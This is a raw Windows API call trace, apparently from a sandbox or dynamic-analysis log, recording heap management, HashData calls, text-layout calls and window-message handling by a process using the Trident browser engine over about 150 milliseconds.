[0176.623] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0176.625] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.626] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f80 [0176.626] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0176.627] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0176.627] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f80 | out: hHeap=0x5e0000) returned 1 [0176.627] LsSetDoc () returned 0x0 [0176.627] LsCreateLine () returned 0x0 [0176.628] LsDisplayLine () returned 0x0 [0176.633] LsDestroyLine () returned 0x0 [0176.633] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.633] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0176.633] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0176.634] HashData (in: pbData=0x9f830a4, cbData=0x4, pbHash=0x9f830a8, cbHash=0x2 | out: pbHash=0x9f830a8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.634] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.634] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.634] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.634] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.634] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.634] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.634] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0176.634] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0176.634] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.634] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.634] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.635] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.635] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.635] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0176.635] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0176.635] HashData (in: pbData=0x9f82f6c, cbData=0x4, pbHash=0x9f82f70, cbHash=0x2 | out: pbHash=0x9f82f70) returned 0x0 [0176.635] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.635] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.635] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.635] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.635] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.635] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.635] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.636] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0176.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0176.636] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.636] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.636] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.637] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0176.637] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0176.637] _CIsqrt () returned 0x407b027f [0176.637] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.637] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.637] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.639] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dddd8 [0176.639] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.639] HashData (in: pbData=0xd95230, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0176.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dddd8 | out: hHeap=0x5e0000) returned 1 [0176.640] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.641] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0176.641] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7708 [0176.641] HashData (in: pbData=0x9f83134, cbData=0x4, pbHash=0x9f83138, cbHash=0x2 | out: pbHash=0x9f83138) returned 0x0 [0176.641] HashData (in: pbData=0x6d7708, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d770a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d770c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.641] HashData (in: pbData=0x6d7714, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d771c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d7724, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d7726, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d7728, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d7730, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.641] HashData (in: pbData=0x6d773c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.641] HashData (in: pbData=0x6d7744, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d7750, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.641] HashData (in: pbData=0x6d7754, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.641] HashData (in: pbData=0x6d775c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.641] HashData (in: pbData=0x6d7768, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.641] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7708 | out: hHeap=0x5e0000) returned 1 [0176.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0176.642] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.642] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.642] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.642] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.642] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.642] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.642] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.642] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.642] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.643] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0176.643] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.643] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.643] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.643] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.643] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.644] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.644] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.646] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0176.647] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.647] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.648] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.648] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.648] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fc8 [0176.650] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0176.650] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0176.650] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0176.651] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0176.680] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0176.680] BitBlt (hdc=0xb010541, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0176.681] ReleaseDC (hWnd=0x103e2, hDC=0xb010541) returned 1 [0176.681] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0176.681] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099550033006) returned 1 [0176.682] DeleteObject (ho=0x28040a81) returned 1 [0176.683] GetCurrentThreadId () returned 0xb48 [0176.683] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0176.683] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3099550179931) returned 1 [0176.683] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3099550186901) returned 1 [0176.683] KillTimer (hWnd=0x30316, uIDEvent=0x2021) returned 1 [0176.684] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.684] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.684] NtdllDefWindowProc_W () returned 0x0 [0176.736] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.736] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.736] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.736] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.736] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.736] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0176.736] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0176.736] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0176.736] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0176.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0176.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0176.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0176.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0176.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0176.737] NtdllDefWindowProc_W () returned 0x0 [0176.737] NtdllDefWindowProc_W () returned 0x0 [0176.739] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.739] IsIconic (hWnd=0x103e0) returned 0 [0176.739] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a17c | out: lpRect=0x19a17c) returned 1 [0176.739] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0176.739] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a17c | out: lprcDst=0xd0c5bc) returned 1 [0176.739] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0176.739] CopyRect (in: lprcDst=0x19a05c, lprcSrc=0x19a17c | out: lprcDst=0x19a05c) returned 1 [0176.739] IntersectRect (in: lprcDst=0x19a06c, lprcSrc1=0x19a05c, lprcSrc2=0x19a17c | out: lprcDst=0x19a06c) returned 1 [0176.739] EqualRect (lprc1=0x19a06c, lprc2=0x19a05c) returned 1 [0176.739] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x1a040a78 [0176.739] GetUpdateRgn (hWnd=0x103e2, hRgn=0x1a040a78, bErase=0) returned 1 [0176.739] DeleteObject (ho=0x1a040a78) returned 1 [0176.739] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0176.740] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.740] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a004*=66530, plResult=0x199e60 | out: plResult=0x199e60) returned 0x1 [0176.740] NtdllDefWindowProc_W () returned 0x0 [0176.740] GetCurrentThreadId () returned 0xb48 [0176.740] GetCurrentThreadId () returned 0xb48 [0176.742] NtdllDefWindowProc_W () returned 0x0 [0176.748] NtdllDefWindowProc_W () returned 0x0 [0176.749] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.749] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a188 | out: phwnd=0x19a188) returned 0x80004005 [0176.749] NtdllDefWindowProc_W () returned 0x1 [0176.752] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.754] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0176.754] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0176.754] NtdllDefWindowProc_W () returned 0x0 [0176.755] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.755] NtdllDefWindowProc_W () returned 0x0 [0176.755] NtdllDefWindowProc_W () returned 0x0 [0176.755] NtdllDefWindowProc_W () returned 0x0 [0176.755] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.755] GetAncestor (hwnd=0x103e2, gaFlags=0x3) returned 0x4031a [0176.755] GetAncestor (hwnd=0x0, gaFlags=0x3) returned 0x0 [0176.756] IsChild (hWndParent=0x103e2, hWnd=0x0) returned 0 [0176.756] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ee8 | out: lpPoint=0x199ee8) returned 1 [0176.756] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ba8 | out: lpPoint=0x199ba8) returned 1 [0176.756] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ba8 | out: lpPoint=0x199ba8) returned 1 [0176.757] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0176.757] GetMessageTime () returned 30893796 [0176.757] GetMessagePos () returned 0x11e01d6 [0176.757] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x199ddc | out: plResult=0x199ddc) returned 0x1 [0176.757] NtdllDefWindowProc_W () returned 0x0 [0176.757] GetCurrentThreadId () returned 0xb48 [0176.758] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.758] GetMessageTime () returned 30893796 [0176.758] GetMessagePos () returned 0x11e01d6 [0176.758] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x199ad4 | out: plResult=0x199ad4) returned 0x0 [0176.762] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.762] GetMessageTime () returned 30893796 [0176.762] GetMessagePos () returned 0x11e01d6 [0176.762] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.762] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.762] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.762] memcpy_s (in: _Destination=0xd9a480, _DestinationSize=0x118, _Source=0xd9a360, _SourceSize=0x118 | out: _Destination=0xd9a480) returned 0x0 [0176.762] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcea0 [0176.763] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0176.763] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0176.764] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcea0 | out: hHeap=0x5e0000) returned 1 [0176.764] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.764] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.764] memcpy_s (in: _Destination=0xd9a5a0, _DestinationSize=0x118, _Source=0xd9a360, _SourceSize=0x118 | out: _Destination=0xd9a5a0) returned 0x0 [0176.764] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcf20 [0176.764] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0176.765] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0176.766] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0176.766] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.766] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcf20 | out: hHeap=0x5e0000) returned 1 [0176.766] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x199394 | out: plResult=0x199394) returned 0x0 [0176.767] GetCurrentThreadId () returned 0xb48 [0176.767] GetCurrentThreadId () returned 0xb48 [0176.767] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099558633516) returned 1 [0176.768] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0176.768] NtdllDefWindowProc_W () returned 0x0 [0176.768] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.768] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.768] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.768] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0176.769] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 